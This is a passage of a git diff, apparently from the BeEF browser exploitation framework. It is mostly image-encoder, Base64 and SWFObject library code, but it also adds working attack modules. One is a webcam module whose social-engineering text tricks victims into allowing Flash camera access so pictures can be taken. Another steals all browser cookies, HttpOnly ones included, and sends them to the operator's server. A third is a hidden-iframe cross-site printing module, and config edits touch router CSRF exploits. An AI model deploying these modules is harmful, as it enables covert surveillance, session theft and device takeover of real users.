writeByte(0); + var i:int; + for (i=0; i<64; i++) { + writeByte(YTable[i]); + } + writeByte(1); + for (i=0; i<64; i++) { + writeByte(UVTable[i]); + } + } + + private function writeDHT():void + { + writeWord(0xFFC4); // marker + writeWord(0x01A2); // length + var i:int; + + writeByte(0); // HTYDCinfo + for (i=0; i<16; i++) { + writeByte(std_dc_luminance_nrcodes[i+1]); + } + for (i=0; i<=11; i++) { + writeByte(std_dc_luminance_values[i]); + } + + writeByte(0x10); // HTYACinfo + for (i=0; i<16; i++) { + writeByte(std_ac_luminance_nrcodes[i+1]); + } + for (i=0; i<=161; i++) { + writeByte(std_ac_luminance_values[i]); + } + + writeByte(1); // HTUDCinfo + for (i=0; i<16; i++) { + writeByte(std_dc_chrominance_nrcodes[i+1]); + } + for (i=0; i<=11; i++) { + writeByte(std_dc_chrominance_values[i]); + } + + writeByte(0x11); // HTUACinfo + for (i=0; i<16; i++) { + writeByte(std_ac_chrominance_nrcodes[i+1]); + } + for (i=0; i<=161; i++) { + writeByte(std_ac_chrominance_values[i]); + } + } + + private function writeSOS():void + { + writeWord(0xFFDA); // marker + writeWord(12); // length + writeByte(3); // nrofcomponents + writeByte(1); // IdY + writeByte(0); // HTY + writeByte(2); // IdU + writeByte(0x11); // HTU + writeByte(3); // IdV + writeByte(0x11); // HTV + writeByte(0); // Ss + writeByte(0x3f); // Se + writeByte(0); // Bf + } + + // Core processing + private var DU:Array = new Array(64); + + private function processDU(CDU:Array, fdtbl:Array, DC:Number, HTDC:Array, HTAC:Array):Number + { + var EOB:BitString = HTAC[0x00]; + var M16zeroes:BitString = HTAC[0xF0]; + var i:int; + + var DU_DCT:Array = fDCTQuant(CDU, fdtbl); + //ZigZag reorder + for (i=0;i<64;i++) { + DU[ZigZag[i]]=DU_DCT[i]; + } + var Diff:int = DU[0] - DC; DC = DU[0]; + //Encode DC + if (Diff==0) { + writeBits(HTDC[0]); // Diff might be 0 + } else { + writeBits(HTDC[category[32767+Diff]]); + writeBits(bitcode[32767+Diff]); + } + //Encode ACs + var end0pos:int = 63; + for (; (end0pos>0)&&(DU[end0pos]==0); end0pos--) { + }; + //end0pos = first element in reverse order !=0 + if ( end0pos == 0) { + writeBits(EOB); + return DC; + } + i = 1; + while ( i <= end0pos ) { + var startpos:int = i; + for (; (DU[i]==0) && (i<=end0pos); i++) { + } + var nrzeroes:int = i-startpos; + if ( nrzeroes >= 16 ) { + for (var nrmarker:int=1; nrmarker <= nrzeroes/16; nrmarker++) { + writeBits(M16zeroes); + } + nrzeroes = int(nrzeroes&0xF); + } + writeBits(HTAC[nrzeroes*16+category[32767+DU[i]]]); + writeBits(bitcode[32767+DU[i]]); + i++; + } + if ( end0pos != 63 ) { + writeBits(EOB); + } + return DC; + } + + private var YDU:Array = new Array(64); + private var UDU:Array = new Array(64); + private var VDU:Array = new Array(64); + + private function RGB2YUV(img:BitmapData, xpos:int, ypos:int):void + { + var pos:int=0; + for (var y:int=0; y<8; y++) { + for (var x:int=0; x<8; x++) { + var P:uint = img.getPixel32(xpos+x,ypos+y); + var R:Number = Number((P>>16)&0xFF); + var G:Number = Number((P>> 8)&0xFF); + var B:Number = Number((P )&0xFF); + YDU[pos]=((( 0.29900)*R+( 0.58700)*G+( 0.11400)*B))-128; + UDU[pos]=(((-0.16874)*R+(-0.33126)*G+( 0.50000)*B)); + VDU[pos]=((( 0.50000)*R+(-0.41869)*G+(-0.08131)*B)); + pos++; + } + } + } + + /** + * Constructor for JPEGEncoder class + * + * @param quality The quality level between 1 and 100 that detrmines the + * level of compression used in the generated JPEG + * @langversion ActionScript 3.0 + * @playerversion Flash 9.0 + * @tiptext + */ + public function JPGEncoder(quality:Number = 50) + { + if (quality <= 0) { + quality = 1; + } + if (quality > 100) { + quality = 100; + } + var sf:int = 0; + if (quality < 50) { + sf = int(5000 / quality); + } else { + sf = int(200 - quality*2); + } + // Create tables + initHuffmanTbl(); + initCategoryNumber(); + initQuantTables(sf); + } + + /** + * Created a JPEG image from the specified BitmapData + * + * @param image The BitmapData that will be converted into the JPEG format. + * @return a ByteArray representing the JPEG encoded image data. + * @langversion ActionScript 3.0 + * @playerversion Flash 9.0 + * @tiptext + */ + public function encode(image:BitmapData):ByteArray + { + // Initialize bit writer + byteout = new ByteArray(); + bytenew=0; + bytepos=7; + + // Add JPEG headers + writeWord(0xFFD8); // SOI + writeAPP0(); + writeDQT(); + writeSOF0(image.width,image.height); + writeDHT(); + writeSOS(); + + + // Encode 8x8 macroblocks + var DCY:Number=0; + var DCU:Number=0; + var DCV:Number=0; + bytenew=0; + bytepos=7; + for (var ypos:int=0; ypos= 0 ) { + var fillbits:BitString = new BitString(); + fillbits.len = bytepos+1; + fillbits.val = (1<<(bytepos+1))-1; + writeBits(fillbits); + } + + writeWord(0xFFD9); //EOI + return byteout; + } + } +} diff --git a/modules/browser/webcam/dev/com/adobe/images/PNGEncoder.as b/modules/browser/webcam/dev/com/adobe/images/PNGEncoder.as new file mode 100755 index 000000000..83c95f629 --- /dev/null +++ b/modules/browser/webcam/dev/com/adobe/images/PNGEncoder.as @@ -0,0 +1,141 @@ +/* + Copyright (c) 2008, Adobe Systems Incorporated + All rights reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are + met: + + * Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + + * Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + * Neither the name of Adobe Systems Incorporated nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS + IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, + THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR + PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR + CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, + EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, + PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR + PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF + LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING + NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS + SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +*/ +package com.adobe.images +{ + import flash.geom.*; + import flash.display.Bitmap; + import flash.display.BitmapData; + import flash.utils.ByteArray; + + /** + * Class that converts BitmapData into a valid PNG + */ + public class PNGEncoder + { + /** + * Created a PNG image from the specified BitmapData + * + * @param image The BitmapData that will be converted into the PNG format. + * @return a ByteArray representing the PNG encoded image data. + * @langversion ActionScript 3.0 + * @playerversion Flash 9.0 + * @tiptext + */ + public static function encode(img:BitmapData):ByteArray { + // Create output byte array + var png:ByteArray = new ByteArray(); + // Write PNG signature + png.writeUnsignedInt(0x89504e47); + png.writeUnsignedInt(0x0D0A1A0A); + // Build IHDR chunk + var IHDR:ByteArray = new ByteArray(); + IHDR.writeInt(img.width); + IHDR.writeInt(img.height); + IHDR.writeUnsignedInt(0x08060000); // 32bit RGBA + IHDR.writeByte(0); + writeChunk(png,0x49484452,IHDR); + // Build IDAT chunk + var IDAT:ByteArray= new ByteArray(); + for(var i:int=0;i < img.height;i++) { + // no filter + IDAT.writeByte(0); + var p:uint; + var j:int; + if ( !img.transparent ) { + for(j=0;j < img.width;j++) { + p = img.getPixel(j,i); + IDAT.writeUnsignedInt( + uint(((p&0xFFFFFF) << 8)|0xFF)); + } + } else { + for(j=0;j < img.width;j++) { + p = img.getPixel32(j,i); + IDAT.writeUnsignedInt( + uint(((p&0xFFFFFF) << 8)| + (p>>>24))); + } + } + } + IDAT.compress(); + writeChunk(png,0x49444154,IDAT); + // Build IEND chunk + writeChunk(png,0x49454E44,null); + // return PNG + return png; + } + + private static var crcTable:Array; + private static var crcTableComputed:Boolean = false; + + private static function writeChunk(png:ByteArray, + type:uint, data:ByteArray):void { + if (!crcTableComputed) { + crcTableComputed = true; + crcTable = []; + var c:uint; + for (var n:uint = 0; n < 256; n++) { + c = n; + for (var k:uint = 0; k < 8; k++) { + if (c & 1) { + c = uint(uint(0xedb88320) ^ + uint(c >>> 1)); + } else { + c = uint(c >>> 1); + } + } + crcTable[n] = c; + } + } + var len:uint = 0; + if (data != null) { + len = data.length; + } + png.writeUnsignedInt(len); + var p:uint = png.position; + png.writeUnsignedInt(type); + if ( data != null ) { + png.writeBytes(data); + } + var e:uint = png.position; + png.position = p; + c = 0xffffffff; + for (var i:int = 0; i < (e-p); i++) { + c = uint(crcTable[ + (c ^ png.readUnsignedByte()) & + uint(0xff)] ^ uint(c >>> 8)); + } + c = uint(c^uint(0xffffffff)); + png.position = e; + png.writeUnsignedInt(c); + } + } +} \ No newline at end of file diff --git a/modules/browser/webcam/dev/com/foxarc/util/Base64.as b/modules/browser/webcam/dev/com/foxarc/util/Base64.as new file mode 100644 index 000000000..fe7d0cd1f --- /dev/null +++ b/modules/browser/webcam/dev/com/foxarc/util/Base64.as @@ -0,0 +1,106 @@ +package com.foxarc.util{ + import flash.utils.ByteArray; + public class Base64 { + private static const encodeChars:Array = + ['A','B','C','D','E','F','G','H', + 'I','J','K','L','M','N','O','P', + 'Q','R','S','T','U','V','W','X', + 'Y','Z','a','b','c','d','e','f', + 'g','h','i','j','k','l','m','n', + 'o','p','q','r','s','t','u','v', + 'w','x','y','z','0','1','2','3', + '4','5','6','7','8','9','+','/']; + private static const decodeChars:Array = + [-1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, 62, -1, -1, -1, 63, + 52, 53, 54, 55, 56, 57, 58, 59, + 60, 61, -1, -1, -1, -1, -1, -1, + -1, 0, 1, 2, 3, 4, 5, 6, + 7, 8, 9, 10, 11, 12, 13, 14, + 15, 16, 17, 18, 19, 20, 21, 22, + 23, 24, 25, -1, -1, -1, -1, -1, + -1, 26, 27, 28, 29, 30, 31, 32, + 33, 34, 35, 36, 37, 38, 39, 40, + 41, 42, 43, 44, 45, 46, 47, 48, + 49, 50, 51, -1, -1, -1, -1, -1]; + public static function encode(data:ByteArray):String { + var out:Array = []; + var i:int = 0; + var j:int = 0; + var r:int = data.length % 3; + var len:int = data.length - r; + var c:int; + while (i < len) { + c = data[i++] << 16 | data[i++] << 8 | data[i++]; + out[j++] = encodeChars[c >> 18] + encodeChars[c >> 12 & 0x3f] + encodeChars[c >> 6 & 0x3f] + encodeChars[c & 0x3f]; + } + if (r == 1) { + c = data[i++]; + out[j++] = encodeChars[c >> 2] + encodeChars[(c & 0x03) << 4] + "=="; + } + else if (r == 2) { + c = data[i++] << 8 | data[i++]; + out[j++] = encodeChars[c >> 10] + encodeChars[c >> 4 & 0x3f] + encodeChars[(c & 0x0f) << 2] + "="; + } + return out.join(''); + } + public static function decode(str:String):ByteArray { + var c1:int; + var c2:int; + var c3:int; + var c4:int; + var i:int; + var len:int; + var out:ByteArray; + len = str.length; + i = 0; + out = new ByteArray(); + while (i < len) { + // c1 + do { + c1 = decodeChars[str.charCodeAt(i++) & 0xff]; + } while (i < len && c1 == -1); + if (c1 == -1) { + break; + } + // c2 + do { + c2 = decodeChars[str.charCodeAt(i++) & 0xff]; + } while (i < len && c2 == -1); + if (c2 == -1) { + break; + } + out.writeByte((c1 << 2) | ((c2 & 0x30) >> 4)); + // c3 + do { + c3 = str.charCodeAt(i++) & 0xff; + if (c3 == 61) { + return out; + } + c3 = decodeChars[c3]; + } while (i < len && c3 == -1); + if (c3 == -1) { + break; + } + out.writeByte(((c2 & 0x0f) << 4) | ((c3 & 0x3c) >> 2)); + // c4 + do { + c4 = str.charCodeAt(i++) & 0xff; + if (c4 == 61) { + return out; + } + c4 = decodeChars[c4]; + } while (i < len && c4 == -1); + if (c4 == -1) { + break; + } + out.writeByte(((c3 & 0x03) << 6) | c4); + } + return out; + } + } +} \ No newline at end of file diff --git a/modules/browser/webcam/dev/takeit.fla b/modules/browser/webcam/dev/takeit.fla new file mode 100644 index 000000000..7de9b071b Binary files /dev/null and b/modules/browser/webcam/dev/takeit.fla differ diff --git a/modules/browser/webcam/module.rb b/modules/browser/webcam/module.rb new file mode 100644 index 000000000..de2df6639 --- /dev/null +++ b/modules/browser/webcam/module.rb @@ -0,0 +1,63 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +require 'base64' +class Webcam < BeEF::Core::Command + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam/takeit.swf', '/takeit', 'swf') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam/swfobject.js', '/swfobject', 'js') + end + def self.options + configuration = BeEF::Core::Configuration.instance + social_engineering_title = "This website is using Adobe Flash" + social_engineering_text = "In order to work with the programming framework this website is using, you need to allow the Adobe Flash Player Settings. If you use the new Ajax and HTML5 features in conjunction with Adobe Flash Player, it will increase your user experience." + no_of_pictures = 20 + interval = 1000 + return [ + {'name' => 'social_engineering_title', + 'description' => 'The title that is shown to the victim.', + 'ui_label' => 'Social Engineering Title', + 'value' => social_engineering_title, + 'width' => '100px' }, { + 'name' => 'social_engineering_text', + 'description' => 'The social engineering text you want to show to convince the user to click the Allow button.', + 'ui_label' => 'Social Engineering Text', + 'value' => social_engineering_text, + 'width' => '300px', + 'type' => 'textarea' }, { + 'name' => 'no_of_pictures', + 'description' => 'The number of pictures you want to take after the victim clicked "allow".', + 'ui_label' => 'Number of pictures', + 'value' => no_of_pictures, + 'width' => '100px' }, { + 'name' => 'interval', + 'description' => 'The interval in which pictures are taken.', + 'ui_label' => 'Interval to take pictures (ms)', + 'value' => interval, + 'width' => '100px' } + ] + end + + + def post_execute + content = {} + content["result"] = @datastore["result"] if not @datastore["result"].nil? + content["picture"] = @datastore["picture"] if not @datastore["picture"].nil? + save content + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/takeit.swf') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js') + end + +end diff --git a/modules/browser/webcam/swfobject.js b/modules/browser/webcam/swfobject.js new file mode 100755 index 000000000..8eafe9dd8 --- /dev/null +++ b/modules/browser/webcam/swfobject.js @@ -0,0 +1,4 @@ +/* SWFObject v2.2 + is released under the MIT License +*/ +var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=Y?/mac/.test(Y):/mac/.test(ah),af=/webkit/.test(ah)?parseFloat(ah.replace(/^.*webkit\/(\d+(\.\d+)?).*$/,"$1")):false,X=!+"\v1",ag=[0,0,0],ab=null;if(typeof t.plugins!=D&&typeof t.plugins[S]==r){ab=t.plugins[S].description;if(ab&&!(typeof t.mimeTypes!=D&&t.mimeTypes[q]&&!t.mimeTypes[q].enabledPlugin)){T=true;X=false;ab=ab.replace(/^.*\s+(\S+\s+\S+$)/,"$1");ag[0]=parseInt(ab.replace(/^(.*)\..*$/,"$1"),10);ag[1]=parseInt(ab.replace(/^.*\.(.*)\s.*$/,"$1"),10);ag[2]=/[a-zA-Z]/.test(ab)?parseInt(ab.replace(/^.*[a-zA-Z]+(.*)$/,"$1"),10):0}}else{if(typeof O.ActiveXObject!=D){try{var ad=new ActiveXObject(W);if(ad){ab=ad.GetVariable("$version");if(ab){X=true;ab=ab.split(" ")[1].split(",");ag=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}}catch(Z){}}}return{w3:aa,pv:ag,wk:af,ie:X,win:ae,mac:ac}}(),k=function(){if(!M.w3){return}if((typeof j.readyState!=D&&j.readyState=="complete")||(typeof j.readyState==D&&(j.getElementsByTagName("body")[0]||j.body))){f()}if(!J){if(typeof j.addEventListener!=D){j.addEventListener("DOMContentLoaded",f,false)}if(M.ie&&M.win){j.attachEvent(x,function(){if(j.readyState=="complete"){j.detachEvent(x,arguments.callee);f()}});if(O==top){(function(){if(J){return}try{j.documentElement.doScroll("left")}catch(X){setTimeout(arguments.callee,0);return}f()})()}}if(M.wk){(function(){if(J){return}if(!/loaded|complete/.test(j.readyState)){setTimeout(arguments.callee,0);return}f()})()}s(f)}}();function f(){if(J){return}try{var Z=j.getElementsByTagName("body")[0].appendChild(C("span"));Z.parentNode.removeChild(Z)}catch(aa){return}J=true;var X=U.length;for(var Y=0;Y0){for(var af=0;af0){var ae=c(Y);if(ae){if(F(o[af].swfVersion)&&!(M.wk&&M.wk<312)){w(Y,true);if(ab){aa.success=true;aa.ref=z(Y);ab(aa)}}else{if(o[af].expressInstall&&A()){var ai={};ai.data=o[af].expressInstall;ai.width=ae.getAttribute("width")||"0";ai.height=ae.getAttribute("height")||"0";if(ae.getAttribute("class")){ai.styleclass=ae.getAttribute("class")}if(ae.getAttribute("align")){ai.align=ae.getAttribute("align")}var ah={};var X=ae.getElementsByTagName("param");var ac=X.length;for(var ad=0;ad'}}aa.outerHTML='"+af+"";N[N.length]=ai.id;X=c(ai.id)}else{var Z=C(r);Z.setAttribute("type",q);for(var ac in ai){if(ai[ac]!=Object.prototype[ac]){if(ac.toLowerCase()=="styleclass"){Z.setAttribute("class",ai[ac])}else{if(ac.toLowerCase()!="classid"){Z.setAttribute(ac,ai[ac])}}}}for(var ab in ag){if(ag[ab]!=Object.prototype[ab]&&ab.toLowerCase()!="movie"){e(Z,ab,ag[ab])}}aa.parentNode.replaceChild(Z,aa);X=Z}}return X}function e(Z,X,Y){var aa=C("param");aa.setAttribute("name",X);aa.setAttribute("value",Y);Z.appendChild(aa)}function y(Y){var X=c(Y);if(X&&X.nodeName=="OBJECT"){if(M.ie&&M.win){X.style.display="none";(function(){if(X.readyState==4){b(Y)}else{setTimeout(arguments.callee,10)}})()}else{X.parentNode.removeChild(X)}}}function b(Z){var Y=c(Z);if(Y){for(var X in Y){if(typeof Y[X]=="function"){Y[X]=null}}Y.parentNode.removeChild(Y)}}function c(Z){var X=null;try{X=j.getElementById(Z)}catch(Y){}return X}function C(X){return j.createElement(X)}function i(Z,X,Y){Z.attachEvent(X,Y);I[I.length]=[Z,X,Y]}function F(Z){var Y=M.pv,X=Z.split(".");X[0]=parseInt(X[0],10);X[1]=parseInt(X[1],10)||0;X[2]=parseInt(X[2],10)||0;return(Y[0]>X[0]||(Y[0]==X[0]&&Y[1]>X[1])||(Y[0]==X[0]&&Y[1]==X[1]&&Y[2]>=X[2]))?true:false}function v(ac,Y,ad,ab){if(M.ie&&M.mac){return}var aa=j.getElementsByTagName("head")[0];if(!aa){return}var X=(ad&&typeof ad=="string")?ad:"screen";if(ab){n=null;G=null}if(!n||G!=X){var Z=C("style");Z.setAttribute("type","text/css");Z.setAttribute("media",X);n=aa.appendChild(Z);if(M.ie&&M.win&&typeof j.styleSheets!=D&&j.styleSheets.length>0){n=j.styleSheets[j.styleSheets.length-1]}G=X}if(M.ie&&M.win){if(n&&typeof n.addRule==r){n.addRule(ac,Y)}}else{if(n&&typeof j.createTextNode!=D){n.appendChild(j.createTextNode(ac+" {"+Y+"}"))}}}function w(Z,X){if(!m){return}var Y=X?"visible":"hidden";if(J&&c(Z)){c(Z).style.visibility=Y}else{v("#"+Z,"visibility:"+Y)}}function L(Y){var Z=/[\\\"<>\.;]/;var X=Z.exec(Y)!=null;return X&&typeof encodeURIComponent!=D?encodeURIComponent(Y):Y}var d=function(){if(M.ie&&M.win){window.attachEvent("onunload",function(){var ac=I.length;for(var ab=0;ab', <%= @command_id %>, 'cookies: ' + JSON.stringify(cookies)); + }) + } else { + chrome.cookies.getAll({}, function(cookies){ + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'cookies: ' + JSON.stringify(cookies)); + }) + } + +}); + diff --git a/modules/chrome_extensions/get_all_cookies/config.yaml b/modules/chrome_extensions/get_all_cookies/config.yaml new file mode 100755 index 000000000..04cc73ebd --- /dev/null +++ b/modules/chrome_extensions/get_all_cookies/config.yaml @@ -0,0 +1,26 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + get_all_cookies: + enable: true + category: "Chrome Extensions" + name: "Get All Cookies" + description: "Steal cookies, even HttpOnly cookies, providing the hooked extension has cookies access.
If a URL is not specified then all cookies are returned (this can be a lot!)" + authors: ["mh"] + target: + working: ["C"] + not_working: ["All"] diff --git a/modules/chrome_extensions/get_all_cookies/module.rb b/modules/chrome_extensions/get_all_cookies/module.rb new file mode 100755 index 000000000..362e62d4f --- /dev/null +++ b/modules/chrome_extensions/get_all_cookies/module.rb @@ -0,0 +1,31 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Get_all_cookies < BeEF::Core::Command + + def self.options + + return [ + {'name' =>'url', 'ui_label'=>'Domain (e.g. http://facebook.com)', 'value' => 'default_all'} + ] + end + + def post_execute + content = {} + content['Return'] = @datastore['return'] + save content + end + +end diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml index 2920b7a84..af3d4a3f0 100644 --- a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml +++ b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml @@ -19,7 +19,7 @@ beef: module: Dlink_dcs_series_csrf: enable: true - category: ["Exploits","Camera"] + category: ["Exploits", "Camera"] name: "Dlink DCS series CSRF" description: "Attempts to change the password on a Dlink DCS series camera." authors: ["bcoles"] diff --git a/modules/exploits/router/bt_home_hub_csrf/config.yaml b/modules/exploits/router/bt_home_hub_csrf/config.yaml index 022045eb9..39034eba7 100644 --- a/modules/exploits/router/bt_home_hub_csrf/config.yaml +++ b/modules/exploits/router/bt_home_hub_csrf/config.yaml @@ -17,7 +17,7 @@ beef: module: bt_home_hub_csrf: enable: true - category: ["Exploits","Router"] + category: ["Exploits", "Router"] name: "BT Home Hub CSRF" description: "Attempts to enable remote administration and change the tech password on a BT Home Hub wireless router." authors: ["bcoles"] diff --git a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml index b502288f1..c579a47b9 100644 --- a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml +++ b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml @@ -17,7 +17,7 @@ beef: module: comtrend_ct5367_csrf: enable: true - category: ["Exploits","Router"] + category: ["Exploits", "Router"] name: "Comtrend CT-5367 CSRF" description: "Attempts to enable remote administration and change the password on a Comtrend CT-5367 router." authors: ["bcoles"] diff --git a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml index fe71d96bf..27f47c06e 100644 --- a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml +++ b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml @@ -17,7 +17,7 @@ beef: module: comtrend_ct5624_csrf: enable: true - category: ["Exploits","Router"] + category: ["Exploits", "Router"] name: "Comtrend CT-5624 CSRF" description: "Attempts to enable remote administration and change the password on a Comtrend CT-5624 router." authors: ["bcoles"] diff --git a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml index aab56869a..d7e6ace24 100644 --- a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml +++ b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml @@ -17,7 +17,7 @@ beef: module: dlink_dsl500t_csrf: enable: true - category: ["Exploits","Router"] + category: ["Exploits", "Router"] name: "D-Link DSL500T CSRF" description: "Attempts to change the password on a D-Link DSL500T router." authors: ["bcoles"] diff --git a/modules/exploits/router/huawei_smartax_mt880/config.yaml b/modules/exploits/router/huawei_smartax_mt880/config.yaml index 0ccbe8c1d..d12a65130 100644 --- a/modules/exploits/router/huawei_smartax_mt880/config.yaml +++ b/modules/exploits/router/huawei_smartax_mt880/config.yaml @@ -17,7 +17,7 @@ beef: module: Huawei_smartax_mt880_csrf: enable: true - category: ["Exploits","Router"] + category: ["Exploits", "Router"] name: "Huawei SmartAX MT880 CSRF" description: "Attempts to add an administrator account on a Huawei SmartAX MT880 router." authors: ["bcoles"] diff --git a/modules/exploits/router/linksys_befsr41_csrf/config.yaml b/modules/exploits/router/linksys_befsr41_csrf/config.yaml index 790045b2f..d3308de95 100644 --- a/modules/exploits/router/linksys_befsr41_csrf/config.yaml +++ b/modules/exploits/router/linksys_befsr41_csrf/config.yaml @@ -17,7 +17,7 @@ beef: module: linksys_befsr41_csrf: enable: true - category: ["Exploits","Router"] + category: ["Exploits", "Router"] name: "Linksys BEFSR41 CSRF" description: "Attempts to enable remote administration and change the password on a Linksys BEFSR41 router." authors: ["Martin Barbella"] diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml index de9c1162d..a64dd89fd 100644 --- a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml +++ b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml @@ -17,7 +17,7 @@ beef: module: linksys_wrt54g2_csrf: enable: true - category: ["Exploits","Router"] + category: ["Exploits", "Router"] name: "Linksys WRT54G2 CSRF" description: "Attempts to enable remote administration and change the password on a Linksys WRT54G2 router." authors: ["Martin Barbella"] diff --git a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml index a85f8d5f4..4129d26e1 100644 --- a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml +++ b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml @@ -17,7 +17,7 @@ beef: module: linksys_wrt54g_csrf: enable: true - category: ["Exploits","Router"] + category: ["Exploits", "Router"] name: "Linksys WRT54G CSRF" description: "Attempts to enable remote administration and change the password on a Linksys WRT54G router." authors: ["Martin Barbella"] diff --git a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml index 42798a2d3..6402686d4 100644 --- a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml +++ b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml @@ -17,7 +17,7 @@ beef: module: Netgear_gs108t_csrf: enable: true - category: ["Exploits","Switch"] + category: ["Exploits", "Switch"] name: "Netgear GS108T CSRF" description: "Attempts to change the password on a Netgear GS108T managed switch." authors: ["Bart Leppens"] diff --git a/modules/ipec/cross_site_printing/command.js b/modules/ipec/cross_site_printing/command.js new file mode 100644 index 000000000..49a0ef690 --- /dev/null +++ b/modules/ipec/cross_site_printing/command.js @@ -0,0 +1,69 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + var target_ip = "<%= @ip %>"; + var target_port = "<%= @port %>"; + + // send a request + function send_msg(ip, port) { + + // create iframe + var iframe = document.createElement("iframe"); + iframe.setAttribute("id","ipc_cross_site_printing_<%= @command_id %>"); + iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;"); + document.body.appendChild(iframe); + iframe = document.getElementById("ipc_cross_site_printing_<%= @command_id %>"); + + // create form + var action = "http://" + ip + ":" + port + "/"; + myform=document.createElement("form"); + myform.setAttribute("name","data"); + myform.setAttribute("method","post"); + myform.setAttribute("enctype","multipart/form-data"); + myform.setAttribute("action",action); + iframe.contentWindow.document.body.appendChild(myform); + + // create message textarea + myExt = document.createElement("textarea"); + 